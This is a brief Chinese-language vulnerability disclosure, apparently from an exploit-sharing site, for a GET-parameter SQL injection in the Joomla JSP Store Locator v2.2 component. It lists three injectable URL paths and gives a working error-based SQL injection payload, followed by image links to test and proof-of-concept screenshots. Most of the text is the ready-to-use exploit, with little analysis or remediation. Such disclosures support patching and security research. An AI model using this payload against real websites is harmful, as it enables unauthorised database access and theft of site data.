Joomla! Component JSP Store Locator v2.2 - SQL Injection
index.php中的id参数带入SQL语句存在GET类型注入
注入点:
http://localhost/[PATH]/index.php?option=com_jsplocation&task=directionview&id=[SQL]
http://localhost/[PATH]/index.php?option=com_jsplocation&task=redirectviewinfo&id=[SQL]
http://localhost/[PATH]/index.php?option=com_jsplocation&view=classic&task=redirectviewinfo&id=[SQL]
报错注入 payload:
option=com_jsplocation&task=directionview&id=1 AND (SELECT 5712 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(5712=5712,1))),0x7171707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
测试截图:
data:image/s3,"s3://crabby-images/05b60/05b60434eff13c1adb9f315771df1f867ffc5eb2" alt=""
其他类型的注入:
data:image/s3,"s3://crabby-images/19e2e/19e2ebf1b8c5ca3128aa60175c0213b593026f7e" alt=""
PoC验证:
data:image/s3,"s3://crabby-images/2a99e/2a99eda36dd64e15ffa9c0229eab53a58cd72d65" alt=""
暂无评论